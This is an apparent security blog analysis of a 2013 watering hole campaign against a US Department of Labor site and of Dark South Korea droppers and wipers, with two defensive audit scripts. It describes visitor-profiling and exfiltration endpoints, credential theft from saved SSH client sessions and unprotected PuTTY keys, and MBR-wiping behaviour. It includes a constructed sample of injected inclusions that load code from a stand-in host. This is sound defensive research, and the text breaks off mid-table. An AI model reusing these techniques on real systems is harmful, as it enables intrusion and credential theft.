Department of Labor Watering Hole Campaign Review
On April 30th, the watering hole campaign was reported on a private mailing list, and on May 1st Invincea and AlienVault publicly reported, with technical details, that the United States Department of Labor (DOL) Site Exposure Matrices (SEM) website had been compromised and was hosting malicious code. This malicious code was used in a watering hole attack that initially targeted employees of the US Department of Energy who work in nuclear weapons programs. The same code was also used to gather information on the visitors of the compromised website.
The exploit used in this campaign was first reported as CVE-2012-4792, an Internet Explorer 0-day used in December 2012 in the CFR.org watering hole campaign and patched by Microsoft in January 2013. Despite the patch release, some forks of this exploit were still used in targeted attacks against political parties, political dissidents, online media and human rights activists.
Two days later, FireEye, Invincea and AlienVault concluded that the vulnerability targeted in this attack campaign was not CVE-2012-4792, as they originally reported, but a new Internet Explorer 8 vulnerability identified as CVE-2013-1347. Unfortunately, this correction came too late: casual attackers, chaotic actors, organized crime and potentially other states involved in sponsored espionage had already had the opportunity to study the attack and recover the evidence.
Microsoft acknowledged the vulnerability in a Microsoft Security Advisory published on May 3rd and identified as MSA-2847140, and provided a “Fix it” solution to mitigate the Internet Explorer 8 vulnerability.
Also, Adobe announced through APSA13-03 that a critical vulnerability (CVE-2013-3336) is actively exploited against ColdFusion. This vulnerability could permit an unauthorized user to remotely retrieve files stored on the server through the “CFIDE/administrator”, “CFIDE/adminapi” and “CFIDE/gettingstarted*” directories. Adobe ColdFusion is used by DOL, and this vulnerability has surely been used to compromise the server.
Possible Causes of Confusion between CVE-2012-4792 and CVE-2013-1347
Confusion with CVE-2012-4792 was possible due to similarities in the code and techniques used:
Usage of widely used JavaScript functions and variables
“function getCookieVal(offset)”, widely used, is also present in the original CVE-2012-4792 exploit and other forks.
“function GetCookie(name)”, widely used, is also present in the original CVE-2012-4792 exploit and other forks.
“function SetCookie(name,value)”, widely used, is also present in the original CVE-2012-4792 exploit and other forks.
“var ua = window.navigator.userAgent.toLowerCase()”, widely used, is also present in the original CVE-2012-4792 exploit and other forks.
Usage of particular JavaScript functions also present in previous watering hole campaigns
“function DisplayInfo()” was also seen in the CVE-2012-4792 and CVE-2011-0611 exploits.
“function download()” and “function callback()” were also seen in the CVE-2012-4792 exploit.
Usage of Ajax XMLHttpRequest
This JavaScript object is used to download the “bookmark.png” file, and was also used to download the “xsainfo.jpg” file in CVE-2012-4792.
Similarities in the JavaScript code structure
If you compare the original CVE-2012-4792 JavaScript code and the Exodus Intel fork with this new exploit, the code structure is very similar in many aspects.
Usage of the HTML+TIME technique
HTML+TIME, which is based on the Synchronized Multimedia Integration Language (SMIL), was also used in certain CVE-2012-4792 forks. This technique was explained by Exodus Intel at the beginning of January 2013.
Target selection
Parts of the code target only Windows XP, Internet Explorer 8 and certain languages, like CVE-2012-4792.
Differences between CVE-2012-4792 and CVE-2013-1347, and Particularities
Some new particularities were present in the exploit and the associated watering hole campaign:
Usage of PHP files
All previous watering hole attacks used HTML or JavaScript files. PHP usage naturally limits the number of potential servers that could be used to start the exploitation and spread the malware. This approach is increasingly the technique used by exploit kits, maybe a source of inspiration and effectiveness for states involved in sponsored espionage.
Usage of Base64 obfuscation
Obfuscation with base64 encoding (the “base64.js” file) was used to hide parts of the exploit. CVE-2012-4792 used a “robots.txt” file obfuscated with substitutions and hex encoding.
Use-after-free type
As mentioned by sinn3r of the Metasploit team, CVE-2012-4792 was a CButton object use-after-free, and CVE-2013-1347 is a CGenericElement object use-after-free.
dol[.]ns01[.]us Exploit Hosting Domain Evolutions
Invincea and AlienVault reported that the browser was redirected to content hosted at dol[.]ns01[.]us, which led to the infection. A urlQuery report of 2013-05-01 is mentioned and refers to dol[.]ns01[.]us on port 8081/TCP. One hit related to the information gathering script mentions a Last-Modified date of Thu, 14 Mar 2013 20:06:36 GMT. You can also observe in the executed JavaScript that the hxxp://dol[.]ns01[.]us:8081/web/js.php and hxxp://dol[.]ns01[.]us:8081/web/css.js URLs are present in the code.
But if you look at a previous urlQuery report of 2013-04-29, hxxp://96[.]44[.]136[.]115/web/js.php, hxxp://96[.]44[.]136[.]115/web/css.js and hxxp:///web/xss.php are mentioned and hard-coded in the executed JavaScript. The 96[.]44[.]136[.]115 IP address is mentioned by AlienVault as the IP address behind dol[.]ns01[.]us. As you can see, no specific destination port is present and the Last-Modified date is the same. So we can conclude that the people behind this campaign changed the malicious code during this interval.
You can observe this evolution in the urlQuery submission of 2013-04-30.
All these urlQuery submissions were done with a non-Internet Explorer 8 user agent, and as the malicious exploit code was designed to target only Windows XP and Internet Explorer 8, part of the redirection chain was not captured as evidence.
If you look at the “/scripts/textsize.js” JavaScript code hosted on the DOL website, you can see a first JavaScript inclusion of “hxxp://dol[.]ns01[.]us:8081/web/xss.php” and a second one of “hxxp://dol[.]ns01[.]us:8081/update/index.php”.
The first inclusion, “/web/xss.php”, was used to gather information on DOL website visitors, and the second inclusion, “/update/index.php”, was used to start the exploitation of CVE-2013-1347.
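As an added example (my own code, not from the original post nor from any of the vendors cited), here is the check a site owner can run over the JavaScript they serve to catch this kind of injected inclusion: it extracts every absolute URL, after first joining “<scr” + “ipt” style split strings, and flags any host outside the site's own allowlist or any port other than 80/443. Both DOL inclusions would have tripped it. The textsize.js content and the hosts in it are constructed; only the /web/xss.php and /update/index.php paths and the 8081 port mirror the campaign.

```python
"""Audit JavaScript served by a site for script/iframe inclusions that load
content from hosts outside an allowlist (added example, not the post's code)."""
import re
from dataclasses import dataclass
from urllib.parse import urlsplit

# Absolute http(s) URLs inside string literals or markup.
URL_RE = re.compile(r"""https?://[^\s'"<>)]+""", re.IGNORECASE)
# "<scr" + "ipt" style string splitting used to hide tags from naive greps.
CONCAT_RE = re.compile(r"""['"]\s*\+\s*['"]""")


@dataclass(frozen=True)
class Finding:
    url: str
    host: str
    port: int
    reason: str


def audit_includes(js_source: str, allowed_hosts: set[str]) -> list[Finding]:
    """Return every absolute URL in js_source that points outside the
    allowlist or uses a port other than 80/443, in sorted URL order."""
    normalized = CONCAT_RE.sub("", js_source)
    findings = []
    for url in sorted(set(URL_RE.findall(normalized))):
        parts = urlsplit(url)
        host = (parts.hostname or "").lower()
        try:
            port = parts.port
        except ValueError:        # malformed port such as "host:abc"
            port = None
        if port is None:
            port = 443 if parts.scheme.lower() == "https" else 80
        reasons = []
        if host not in allowed_hosts:
            reasons.append("host outside allowlist")
        if port not in (80, 443):
            reasons.append(f"non-standard port {port}")
        if reasons:
            findings.append(Finding(url, host, port, "; ".join(reasons)))
    return findings


# Constructed sample: a text-resize helper with two injected inclusions,
# modelled on the textsize.js modification described above (hosts invented).
SAMPLE_TEXTSIZE_JS = r"""
function setTextSize(size) { document.body.style.fontSize = size; }
document.write('<script src="http://www.site.example/scripts/jquery.js"></script>');
document.write('<scr' + 'ipt src="http://bad-cdn.example:8081/web/xss.php"></scr' + 'ipt>');
var u = "http://bad-cdn.example:8081/update/index.php";
var f = document.createElement("iframe"); f.src = u; f.width = 0; document.body.appendChild(f);
"""

SITE_HOSTS = {"www.site.example"}   # hosts the site legitimately loads code from


def main():
    for finding in audit_includes(SAMPLE_TEXTSIZE_JS, SITE_HOSTS):
        print(f"{finding.url}  ->  {finding.reason}")


if __name__ == "__main__":
    main()
```

Run it against every .js file pulled from the web root; anything reported is either a third-party dependency to put on the allowlist or an injection to investigate.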
Information Gathering Scripts
As described by AlienVault, the information gathering code “/web/xss.php” on dol[.]ns01[.]us uses different JavaScript functions to collect information from the system and upload the result to the malicious server.
I found that the information gathering script was different depending on the browser used. Below is a description of the JavaScript functions involved in information gathering, depending on the browser used.
DOL Information Gathering Functions
| JavaScript Function(s) | Targeted Browser(s) | Function Description |
|---|---|---|
| jstocreate() | Internet Explorer | Tests the presence of the Avira, Bitdefender 2013, McAfee VirusScan Enterprise, AVG Secure Search, ESET NOD32, Dr.Web, Microsoft Security Essentials, Sophos, F-Secure Antivirus 2011, Kaspersky 2012 and Kaspersky 2013 anti-viruses. |
| flashver() | Internet Explorer & Firefox & Chrome | Tests the presence and version of Adobe Flash, and the supported OS. |
| officever() | Internet Explorer | Tests the presence and version of Microsoft Office. |
| plugin_pdf_ie() | Internet Explorer | Tests the presence of Adobe Reader. |
| bitdefender2012check() | Internet Explorer & Firefox & Chrome | Tests the presence of BitDefender 2012 and tries to disable it through the disabledbitdefender_2012() function. |
| java() | Internet Explorer & Firefox & Chrome | Tests the presence and version of the Oracle Java plug-in. |
| xunleicheck() | Firefox & Chrome | Tests the presence of the xThunder Chrome extension, an extension managing popular downloaders. |
| kavcheck() | Firefox & Chrome | Tests the presence of the Kaspersky Chrome extension. |
| fiddlercheck() | Firefox & Chrome | Tests the presence of the Fiddler Chrome extension. Fiddler is an HTTP debugging proxy server application. |
| liveheadercheck() | Firefox & Chrome | Tests the presence of the Live HTTP Headers Chrome extension. |
| webdevelopercheck() | Firefox & Chrome | Tests the presence of the Web Developer Chrome extension. |
| avg2012check() | Firefox & Chrome | Tests the presence of the AVG 2012 Chrome extension. |
| tamperdatacheck() | Firefox & Chrome | Tests the presence of the Tamper Data Chrome extension. |
| adblockcheck() | Firefox & Chrome | Tests the presence of the Adblock Chrome extension. |
| avastcheck() | Firefox & Chrome | Tests the presence of the Avast! Chrome extension. |
| pluginverother() | Firefox & Chrome | Enumerates all installed modules. |
Also, a specific information gathering technique was triggered when Internet Explorer was used. This technique relies on an unpatched vulnerability in Internet Explorer 8, discovered by NSFOCUS and reported to Microsoft in 2011. The vulnerability could allow user information and even local file content to leak if a user views a specially crafted webpage using Internet Explorer.
Once all the information is gathered, the script sends all the data to a specific URL, “hxxp://dol[.]ns01[.]us:8081/web/js.php”, and also calls “hxxp://dol[.]ns01[.]us:8081/web/css.js” when the information has been collected.
An interesting detail regarding “/web/css.js” is that the “Last-Modified” date reported by the “dol[.]ns01[.]us” server is Thu, 14 Mar 2013 20:06:36 GMT. This indicates that the information gathering infrastructure has been in place since at least mid-March.
Interesting facts regarding these information gathering scripts:
- The “xss.php”, “js.php” and “css.js” scripts moved from IP 96[.]44[.]136[.]115 on port 80/TCP to the domain dol[.]ns01[.]us on port 8081/TCP. Moving from port 80/TCP to 8081/TCP does not seem logical: most of the time, the outgoing connections authorized on firewalls for corporate web browsing are 80/TCP and 443/TCP.
- Different types of information gathering scripts were in place, and all users who visited the DOL website were affected by this information gathering campaign.
- Usage of a specific information leakage vulnerability present in Internet Explorer 8 and not fixed by Microsoft.
- The BitDefender 2012 deactivation attempt is confusing. Why try to deactivate an anti-virus? This will surely generate an alert.
Information Gathered on dol[.]ns01[.]us
As described in the previous chapter, the information gathering code sends a lot of information to the backend. Fortunately for security researchers, the backend wasn't very well protected, and all the collected information was accessible without any restriction in different web folders. Below are some statistics related to the gathered information.
Complete geolocation of the targeted source IPs
By analyzing the information sent to the backend, we can also see that DOL (www.sem.dol.gov) wasn't the only compromised website:
- From 2013-03-15 to 2013-04-29: the University Research Co. Cambodia website (www.urccambodia.org) was the first target. This explains the high number of distinct IP addresses from Cambodia.
- From 2013-04-08 to 2013-04-24: the Awards for Excellence in Education website (www.forexcellenceineducation.org), a program of the Fraser Institute, was the second target.
- From 2013-04-08 to 2013-04-24: the ElectionGuide website (www.electionguide.org), provided by the International Foundation for Electoral Systems (IFES), was the third target.
- From 2013-04-09 to 2013-04-30: the French Institute of International Relations website (www.ifri.org) was the fourth target.
- From 2013-04-09 to 2013-04-24: The Working for America Institute website (www.workingforamerica.org) was the fifth target.
- From 2013-04-09 to 2013-04-10: The Project 2049 Institute website (www.project2049.net) was the sixth target.
- From 2013-04-10 to 2013-04-10: The Union Label and Service Trades Department website (www.unionlabel.org) was the seventh target.
- From 2013-04-11 to 2013-04-30: the Thales Catalogue website (components-subsystems.thales-catalogue.com) was the eighth target.
- From 2013-04-23 to 2013-05-01: the United States Department of Labor (DOL) Site Exposure Matrices (SEM) website (www.sem.dol.gov) was the ninth target.
Below are the hits by browser and the Internet Explorer 8 hits by OS.
Other Information Gathered
As you read in the previous chapter, the ElectionGuide website (www.electionguide.org) was also targeted during this watering hole campaign. As you can see in the following urlQuery submission, dating from 2013-05-01, 96[.]44[.]136[.]115 is also present but no longer responds. Also, if you look at the urlQuery submission of 2013-05-03, 96[.]44[.]136[.]115 is still present, but a new backend server has been set up to replace the deactivated one.
If you look at the “Last-Modified” date of the “css.js” file, the installation date of these files is at least 2013-05-03.
Also, by searching Google for patterns matching the information gathering script, you can find some previously unknown campaigns that were using the same code.
Dark South Korea and Discovered PuTTY Tools Behaviours
By analyzing one of the Dark South Korea droppers, I discovered interesting behaviours associated with the PuTTY binaries installed in the “%TMP%” Windows folder. These behaviours could be considered as expected, but they could be used more efficiently in the future.
The two installed binaries are “alg.exe” and “conime.exe”, used to upload the “~pr1.tmp” bash file to *NIX targets discovered in the configuration files of mRemote and SecureCRT.
“alg.exe” is “plink.exe”, a PuTTY tool acting as a command-line interface to the PuTTY back ends, and “conime.exe” is “pscp.exe”, the PuTTY tool acting as an SCP client, i.e. command-line secure file copy. These two binaries are legitimate and do not contain any malware; they are only used by the malware as support tools.
If mRemote is installed, the dropper extracts all the required information (credentials, ports, IP/domain) from the “confCons.xml” configuration file, and uses an encryption method vulnerability in mRemote to decrypt the stored password. After exploitation of the vulnerability, “conime.exe” is used to drop the bash file on the targeted servers.
If the latest version of SecureCRT is installed, the dropper extracts all the required information (credentials, ports, IP/domain) present in the “*.ini” configuration files. Each saved connection in SecureCRT uses its own “*.ini”. It seems that an unknown vulnerability was present in previous versions of SecureCRT that allowed decrypting the stored password, but in the latest version of SecureCRT this vulnerability does not seem to be present. So when “conime.exe” tries to connect to the targeted servers, the authentication fails due to a bad password.
During my research on the potential SecureCRT vulnerability, I was intrigued by “conime.exe” access attempts to the PuTTY registry keys “HKCU\Software\SimonTatham\PuTTY\Sessions” and “HKCU\Software\SimonTatham\PuTTY\SshHostKeys”.
I decided to install PuTTY, like a majority of sysadmins, and create an entry corresponding to the potential server also recorded in the SecureCRT software.
Then I executed the dropper one more time and discovered that “conime.exe”, as expected, accessed the PuTTY registry key related to the targeted server, “HKCU\Software\SimonTatham\PuTTY\Sessions\192.168.178.54”. The dropper's authentication attempt was still unsuccessful, due to the wrong password.
But I also observed that “conime.exe” was trying to access another PuTTY registry key, “HKCU\Software\SimonTatham\PuTTY\SshHostKeys\rsa2@22:192.168.178.54”.
I then decided to create a private and public SSH key pair, and to configure my PuTTY session to support this SSH private key authentication. The private key wasn't protected by a passphrase.
I executed the dropper one more time and observed a successful authentication on the targeted server. “conime.exe” was using the private key path present in the PuTTY registry key.
My final test was to remove the private key from the PuTTY configuration and use “pageant.exe”, an SSH authentication agent for PuTTY, PSCP, PSFTP and Plink. I loaded my private key in “pageant.exe” and executed the dropper one more time. Same result as the previous one: a successful authentication on the targeted server.
Conclusions
- By analyzing one of the Dark South Korea droppers, together with the associated vulnerabilities in mRemote and SecureCRT, we can observe that the “bad guys” used old vulnerabilities in old software to infect *NIX servers. Why use these old vulnerabilities, if you can simply target PuTTY when it is used with private keys?
- Never generate a private key without a passphrase.
- Don't let PuTTY Pageant run with loaded private keys.
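The following audit is an added example (my own code, not from the post and not part of PuTTY) for the first of these conclusions: it parses .ppk files and reports those saved with “Encryption: none”, the header PuTTYgen writes when no passphrase is set, and on Windows it walks HKCU\Software\SimonTatham\PuTTY\Sessions and reads each session's PublicKeyFile value so that every key a saved session points at gets checked, which is exactly the registry path the dropper followed. The two key files are constructed with truncated bodies, and the session names and file paths are invented.

```python
"""Find PuTTY private keys stored without a passphrase: parse .ppk headers
and, on Windows, follow the PublicKeyFile value of every saved session.
Added example, not code from the original post or from PuTTY."""
import re
from dataclasses import dataclass
from pathlib import Path
from typing import Callable
from urllib.parse import unquote

try:
    import winreg           # Windows only; the session walk returns {} elsewhere
except ImportError:
    winreg = None

SESSIONS_KEY = r"Software\SimonTatham\PuTTY\Sessions"
PPK_HEADER_RE = re.compile(r"^PuTTY-User-Key-File-(\d+):\s*(\S+)\s*$")
FIELD_RE = re.compile(r"^([A-Za-z][A-Za-z0-9-]*):\s*(.*)$")


@dataclass(frozen=True)
class PpkInfo:
    version: int
    key_type: str
    encryption: str
    comment: str

    @property
    def unprotected(self) -> bool:
        # PuTTYgen writes "Encryption: none" when no passphrase is set.
        return self.encryption.lower() == "none"


def parse_ppk(text: str) -> PpkInfo:
    """Read the header fields of a .ppk file (format versions 2 and 3)."""
    lines = text.strip().splitlines()
    if not lines:
        raise ValueError("empty key file")
    header = PPK_HEADER_RE.match(lines[0])
    if not header:
        raise ValueError("not a PuTTY key file")
    fields = {}
    for line in lines[1:]:
        m = FIELD_RE.match(line)       # base64 body lines never contain ':'
        if m:
            fields[m.group(1)] = m.group(2)
    return PpkInfo(int(header.group(1)), header.group(2),
                   fields.get("Encryption", "unknown"), fields.get("Comment", ""))


def saved_session_keyfiles() -> dict[str, str]:
    """Session name -> PublicKeyFile for saved sessions that use a key file.
    PuTTY stores session names %XX-escaped, hence the unquote."""
    if winreg is None:
        return {}
    result = {}
    try:
        with winreg.OpenKey(winreg.HKEY_CURRENT_USER, SESSIONS_KEY) as sessions:
            index = 0
            while True:
                try:
                    name = winreg.EnumKey(sessions, index)
                except OSError:
                    break
                index += 1
                with winreg.OpenKey(sessions, name) as session:
                    try:
                        keyfile, _ = winreg.QueryValueEx(session, "PublicKeyFile")
                    except FileNotFoundError:
                        continue
                if keyfile:
                    result[unquote(name)] = keyfile
    except FileNotFoundError:
        pass
    return result


def audit(keyfiles: dict[str, str],
          read: Callable[[str], str] = lambda p: Path(p).read_text()) -> list[tuple[str, str, PpkInfo]]:
    """(session, path, info) for every referenced key stored without a passphrase."""
    exposed = []
    for session, path in keyfiles.items():
        try:
            info = parse_ppk(read(path))
        except (OSError, KeyError, ValueError):   # missing file or not a .ppk
            continue
        if info.unprotected:
            exposed.append((session, path, info))
    return exposed


# Constructed key files with truncated, meaningless bodies (not real keys).
UNPROTECTED_PPK = """PuTTY-User-Key-File-2: ssh-rsa
Encryption: none
Comment: rsa-key-20130401
Public-Lines: 1
AAAAB3NzaC1yc2EAAAABJQAAAIEA
Private-Lines: 1
AAAAgQC
Private-MAC: 0000000000000000000000000000000000000000
"""
PROTECTED_PPK = """PuTTY-User-Key-File-3: ssh-ed25519
Encryption: aes256-cbc
Comment: ed25519-key-20240101
Public-Lines: 1
AAAAC3NzaC1lZDI1NTE5
Key-Derivation: Argon2id
Argon2-Memory: 8192
Argon2-Passes: 21
Argon2-Parallelism: 1
Argon2-Salt: 00
Private-Lines: 1
AAAAgQC
Private-MAC: 0000000000000000000000000000000000000000
"""
FAKE_FILES = {r"C:\keys\lab.ppk": UNPROTECTED_PPK, r"C:\keys\prod.ppk": PROTECTED_PPK}
FAKE_SESSIONS = {"192.168.178.54": r"C:\keys\lab.ppk", "prod": r"C:\keys\prod.ppk"}


def main():
    # On a real workstation: audit(saved_session_keyfiles()). The demo uses constructed data.
    for session, path, info in audit(FAKE_SESSIONS, FAKE_FILES.__getitem__):
        print(f"session {session!r} uses {path} ({info.key_type}, v{info.version}) with no passphrase")


if __name__ == "__main__":
    main()
```

A key that this script reports is usable by anything running as that user, which is what the dropper demonstrated; the fix is to re-save it with a passphrase in PuTTYgen. The second conclusion, about Pageant, cannot be checked from the key file at all: an agent-loaded key is protected only as long as the agent is not running.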
Dark South Korea Total War Review
As mentioned by different media, security vendors and security researchers, some South Korean banks and broadcasting organizations went dark on Wednesday 20 March, victims of a cyber attack. The initially impacted broadcasters were KBS, MBC and YTN, and the impacted banks were Cheju, Nonghyup and Shinhan.
But by analyzing all the events related to this cyber attack, we can see that the campaign was more extended in time than mentioned, and also more complex to understand. The campaign is composed of different samples, potentially created by different authors with different objectives. We can divide the reported samples into different categories:
- Wipe: the objective of these samples is to erase all data on the affected targets.
- Drop & Wipe: the objective of these samples is to drop a wiper to erase all data on the affected targets.
- Drop & Wipe & Deface: the objectives of these samples are to drop a wiper to erase all data and to deface websites hosted by the affected targets.
- Drop & Backdoor: the objective of these samples is to install a backdoor, or trojan, on the affected targets.
- Unknown: these samples are potentially not related to the campaign.
I will try, through this blog post, to provide you with the most reliable information possible regarding the Dark South Korea campaign.
According to different sources, and as announced by the South Korean security provider AhnLab on Thursday 21 March, the “bad guys” got access to AhnLab Policy Center and HAURI ViRobot ISMS, two asset management tools, through stolen credentials in order to massively spread Trojan.Jokra. But, according to the latest news announced on 29 March, it seems that the AhnLab APC product was vulnerable to a login authentication bypass, and that this vulnerability was used by the bad guys to get access to APC and spread the malware.
On Wednesday 20 March, AhnLab stock gained 6.5 percent (75,100 KW to 80,000 KW), stemming from expectations of demand for online security software following the hacking incident. But after the 21 March AhnLab announcement, the stock was down 3.6 percent (from 80,000 KW to 74,700 KW). Since 21 March, AhnLab stock has fallen from 74,700 KW to 68,100 KW.
KCC reported that around 47,800 units were impacted by this cyber attack. You will find the known impacts in the following graphical representation. This graphical representation has been inspired by the work of @piyokango, a must-read blog post!
Also translated from @piyokango's work, the associated event timeline. Through this timeline you can better understand all the actors and impacts involved in this cyber attack.
Dark South Korea Events Timeline
| Date | Time | Event |
|---|---|---|
| 3/20 | At around 2pm | Financial and broadcasting organizations' computers stop suddenly and cannot restart |
| | 2:25pm | KCC starts to receive incident reports |
| | 2:35pm | KCC & KISA confirm outages at financial and broadcasting organizations |
| | 2:40pm | YTN TV reports the incidents |
| | 2:50pm | South Korean presidency acknowledges the incidents |
| | 3pm | KISA raises its alert level |
| | 3:05pm | NongHyup Bank initiates blocking measures |
| | At around 3pm | Shinhan Bank central server is down |
| | At around 3pm | Cyber police announce the possibility of an attack and start the investigation |
| | 3:10pm | South Korean army raises its alert level |
| | 3:20pm | Shinhan Bank business recovery |
| | 4:20pm | NongHyup Bank business recovery |
| | At around 4pm | MBC TV internal network reported as impacted |
| | At around 4pm | Extended opening hours after 6pm for banks |
| | 5:49pm | AhnLab anti-virus engine is updated |
| | 6:40pm | AhnLab distributes counter measures |
| | At around 9pm | KBS internal information system reported as impacted |
| 3/21 | 6:30am | MBC Gyeongnam TV internal network is stopped |
| | 7:25am | KBS TV internal network business recovery, except for PCs |
| | 11:30am | KCC chairman visits KISA |
| | At around 5pm | 16 NongHyup Bank offices still not able to recover |
| 3/22 | At around 6am | 87% of NongHyup Bank cooperatives and 78% of their ATMs have been recovered |
| | At around 3pm | KCC reports that the China attribution was a mistake |
| 3/24 | At around 6pm | NongHyup Bank adds some additional counter measures |
| | | NongHyup Bank full business recovery |
| 3/25 | At around 6am | NongHyup Bank segregates its internal and external networks (lol) |
| | 10:30am to 1:45pm | Time zone attacks reported and security warning raised by AhnLab |
| | | International cooperation requested for the investigations |
| 3/26 | 9:21am | Additional counter measures provided by AhnLab |
| | 9:40am | 6 YTN TV affiliates overloaded by traffic |
| | 10:40am | Network overload disrupting 8 municipalities' web sites (Seoul, Gyeonggi, Incheon, Gwangju, Jeonnam, Jeonbuk, Gangwon, Jeju) |
| | 11:22am | Network overload disrupting 7 South Korean regions |
| | 11:50am | Military experts join the public-private incident response task force |
| | 00:04pm | Network failure recovery |
| | 01:40pm to 02:30pm | Daily NK web site disrupted and posts deleted |
| | | Free North Korea TV web site disrupted |
| | 02:00pm to 02:15pm | Ministries' web sites disrupted |
| | 02:30pm to around 05pm | Other North Korean activists' web sites disrupted |
| 3/27 | - | The Financial Services Commission announces special inspections of the targeted financial institutions |
| 3/28 | - | YTN TV web site recovery |
| 3/29 | 11:09am | AhnLab announces that APC was vulnerable to an authentication bypass weakness |
| | - | Response Team announces a return to normal |
The current investigation results indicate that foreign source IPs (3 European countries and the US, but not China) were discovered as potential sources of the attack, and that potentially 14 variants of the malware were discovered and analyzed.
The security firm Xecure Lab has provided some information regarding Dark South Korea; malware hashes are available with some detailed analysis. Malware samples were also available in private groups and on contagio. Based on these hashes and samples, you can find an analysis below.
Samples Analysis
Presumed Dropper(s)
| MD5 | 9263E40D9823AECF9388B64DE34EAE54 |
| Size | 417.5 KB |
| Compilation timedatestamp | 2013-03-20 04:07:02 |
| Modify Date | None |
| File mapping object | None |
| Resource language(s) | English & Korean |
| Strings | N/A |
| URL | None |
| Other names | APCRunCmd.DRP - K10 |
This executable drops “AgentBase.exe” (db4bbdc36a78a8807ad9b15a562515c4), “alg.exe” (e45cd9052dd3dd502685dfd9aa2575ca), “conime.exe” (6a702342e8d9911bde134129542a045b) and “~pr1.tmp” (dc789dee20087c5e1552804492b042cd) in “%TMP%”, then executes “AgentBase.exe”. Remarks: also known as K10 by Xecure Lab, mentioned as a wiper, but it is a dropper. This sample could be categorized as Drop & Wipe.
Also, the dropped “AgentBase.exe” is known as K01 on Xecure Lab, mentioned as a wiper only. “AgentBase.exe” is a Windows wiper, but also the dropper for the *NIX batch wiper, aka “~pr1.tmp”. More information in the “9263E40D9823AECF9388B64DE34EAE54 Dropper Analysis” chapter of this blog.
| MD5 | 50E03200C3A0BECBF33B3788DAC8CD46 |
| Size | 24 KB |
| Compilation timedatestamp | 2012-07-06 12:24:18 |
| Modify Date | None |
| File mapping object | FFFFFFF-198468CD-6937629023-EF90000000 |
| Resource language(s) | None |
| Strings | hello |
| URL | hxxp://www.skymom.co.kr/rgboard/addon/update/update_body.jpg |
| Other names | K06 |
It seems that “update_body.jpg” (a03ae3a480dd17134b04dbc5e62bf57b), first seen on 2012-08-28 04:31:52, is the same as the one mentioned on SCUMWARE on 2012-08-30. You can find this sample on malware.lu. Symantec and McAfee have tried to establish a relation based on the packer used and on some common compilation paths. But like McAfee, I don't see any relation between this dropper and the 03.20 Dark South Korea campaign. Known as K06 on Xecure Lab. This sample could be categorized as Drop & Backdoor, or Unknown.
| MD5 | E4F66C3CD27B97649976F6F0DAAD9032 |
| Size | 24 KB |
| Compilation timedatestamp | 2012-07-06 12:24:18 |
| Modify Date | None |
| File mapping object | FFFFFFF-198468CD-6937629023-EF90000000 |
| Resource language(s) | None |
| Strings | hello |
| URL | hxxp://www.anulaibar.com/e107/e107_files/js/e107_001.cab |
| Other names | K05 |
Here also, I don't see any relation between this dropper and the 03.20 Dark South Korea campaign. Known as K05 on Xecure Lab and mentioned by McAfee. This sample could be categorized as Drop & Backdoor, or Unknown.
| MD5 | 2F9AF723E807FF44C2684E5D644EBE46 |
| Size | 38.8 KB |
| Compilation timedatestamp | None |
| Modify Date | 2013:03:17 23:41:07 |
| File mapping object | None |
| Resource language(s) | None |
| Strings | None |
| URL | None |
| Other names | 고객계좌내역.rar - K08 |
Known as K08 on xsecure-lab.com, and like the people at Xecure Lab, I don't see any relation between this dropper and the 03.20 Dark South Korea campaign. F-Secure has tried to link this sample to the campaign. This sample could be categorized as Unknown.
| MD5 | 530c95eccdbd1416bf2655412e3dddb |
| Size | Unknown |
| Compilation timedatestamp | Unknown |
| Modify Date | None |
| File mapping object | Unknown |
| Resource language(s) | Unknown |
| Strings | HASTATI. / PR!NCPES and other unknowns |
| URL | Unknown |
| Other names | Unknown |
This sample was mentioned by Symantec and AhnLab on 23 March. A particularity of this sample is that it drops 2 files and injects one of them into the “LSASS.exe” process as a DLL. Also, this sample will execute every year on 20 March at 2pm and wipe the MBR with the “HASTATI.” and “PR!NCPES” strings. Unfortunately I wasn't able to find this sample. This sample could be categorized as Drop & Wipe.
| MD5 | e823221609b37e99fbbce5b493a02f68 |
| Size | 236.0 KB |
| Compilation timedatestamp | 2013-03-19 23:57:06 |
| Modify Date | None |
| File mapping object | None |
| Resource language(s) | Korean |
| Strings | MICRO_ESENCIAL0192301 / Alerter / Sens / Hacked By Whois Team / morpsntls.exe / and bunch of others |
| URL | None |
| Other names | cmsvrts.exe / K07 |
This sample was also mentioned on 20 March by different media, security vendors and researchers. It was used against LG UPlus Corp and showed a page that said it had been hacked by a group calling itself the “Whois Team”.
A particularity of this sample is that it seems to be triggered only under certain conditions, and these conditions seem to be related to a certain time zone, as mentioned by AhnLab on 23 March. The sample drops the “mp.swf”, “lf.mp3”, “24mhk04.gif” and “25z18pg.jpg” files, adds “MICRO_ESENCIAL0192301” as a mutex, modifies registry entries under “SYSTEM\CurrentControlSet\Control\Session Manager\Memory Management”, overwrites all “.html”, “.htm”, “.aspx”, “.asp”, “.jsp”, “.do” and “.php” files with its code, terminates the Windows Alerter service (Alerter) and the Windows System Event Notification Service (Sens), and destroys all MBR data. This sample could be categorized as Drop & Wipe & Deface.
Presumed Wiper(s)
Symantec, Tripwire, Xecure Lab and contagio reported hashes of different wipers. Below is an analysis of these wipers, with some corrections.
| MD5 | 0a8032cd6b4a710b1771a080fa09fb87 |
| Size | 24 KB |
| Compilation timedatestamp | 2013-01-31 10:27:18 |
| File mapping object | JO840112-CRAS8468-11150923-PCI8273V |
| Strings | PR!NCPES / HASTATI. / \Temp\~v3.log |
| Check "~v3.log" | No |
| Task kill | pasvc.exe (AhnLab Policy Agent) / clisvc.exe (Hauri ViRobot) |
| Wiper timing | Immediate |
| Shutdown | shutdown -r -t 0 |
| Other names | mb_join.gif / mb_join.exe / K03 |
| Mentioned by | contagio & Symantec |
Even if the “~v3.log” file is present in the “C:\WINDOWS\Temp\” directory, the wiper runs directly. This sample could be categorized as Wiper.
| MD5 | 5fcd6e1dace6b0599429d913850f0364 |
| Size | 24 KB |
| Compilation timedatestamp | 2013-01-31 10:27:18 |
| File mapping object | JO840112-CRAS8468-11150923-PCI8273V |
| Strings | HASTATI. |
| Check "~v3.log" | No |
| Task kill | pasvc.exe (AhnLab Policy Agent) / Clisvc.exe (Hauri ViRobot) |
| Wiper timing | Immediate |
| Shutdown | shutdown -r -t 0 |
| Other names | AmAgent.exe / OthDown.exe / K04 |
| Mentioned by | contagio & Symantec & Tripwire |
This sample could be categorized as Wiper.
| MD5 | db4bbdc36a78a8807ad9b15a562515c4 |
| Size | 24 KB |
| Compilation timedatestamp | 2013-01-31 10:27:18 |
| File mapping object | JO840112-CRAS8468-11150923-PCI8273V |
